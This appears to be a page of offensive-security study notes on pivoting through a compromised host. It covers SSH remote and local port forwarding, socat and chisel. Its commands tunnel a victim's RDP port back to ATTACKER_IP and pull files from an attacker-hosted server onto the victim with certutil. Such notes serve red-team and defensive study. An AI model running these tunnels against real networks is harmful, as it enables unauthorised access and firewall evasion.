Skip to main content

Port Forwarding

Port Forwarding is a mechanism for Tunneling Application Ports from the Client Machine to the Server Machine, or vice versa. It can be used for adding encryption to legacy applications, going through Firewalls.

System Administrators use it for opening Backdoors into the Internal Network from their Home Machines.


SSH Remote Port Forwarding

Useful when Firewall Policies block the Attacker's Machine from directly accessing Port 3389 on the Server. If the Attacker has previously compromised PC-1 and, in turn, PC-1 has access to port 3389 of the server, it can be used to Pivot to Port 3389 using Remote Port Forwarding from PC-1.

Remote Port Forwarding allows to take a reachable Port from the SSH Client [PC-1] and Project it into a Remote SSH Server [Attacker].


With this method a Port will be opened in the Attacker Machine that can be used to connect back to Port 3389 in the Server through the SSH Tunnel. PC-1 will, in turn, Proxy the Connection so that the Server will see all the Traffic as if it was coming from PC-1.

:: -R [Request Remote Port Forward]
ssh user@ATTACKER_IP -R 3389:127.0.0.1:3389 -N
:: Accessing the Port from the Attacker Machine
xfreerdp /v:127.0.0.1 /u:username /p:password /port:3389

SSH Local Port Forwarding

Local Port Forwarding allows to Pull a Port from an SSH Server into the SSH Client. This could be used to take any Service available in an Attacker Machine and make it available through a port on PC-1.

This way, any Host that can't connect directly to the Attacker PC but can connect to PC-1 will now be able to reach the Attacker Services through the Pivot Host.

:: -L [Request Local Port Forward]
ssh tunneluser@ATTACKER_IP -L 7000:127.0.0.1:7000 -N
:: Hosting a Server on the Attacker Machine
python3 -m http.server 7000

:: The Server is accessible on the Victim Machine
certutil -urlcache -split -f "http://127.0.0.1:7000/test.md"

SOCAT

One of the Disadvantages of using Socat is that we need to Transfer it to the Pivot Host PC-1, making it more detectable than SSH.

:: Forwarding Filtered Port [3389]
socat TCP4-LISTEN:7777,fork TCP4:VICTIM_IP:3389
:: If the Port [3389] was Filtered now it would be Accessible
xfreerdp /v:VICTIM_IP /u:username /p:password /port:7777

CHISEL

Chisel is a fast TCP/UDP Tunnel, transported over HTTP, secured via SSH. Chisel is mainly useful for passing through Firewalls.

:: Listens for Connections
chisel server --reverse --port 8000

:: Accessing the Port from the Attacker Machine
:: The Victim [RDP: 3389] is now Accessible at [PORT: 7777] on the Attacker Machine
xfreerdp /v:127.0.0.1 /u:username /p:password /port:7777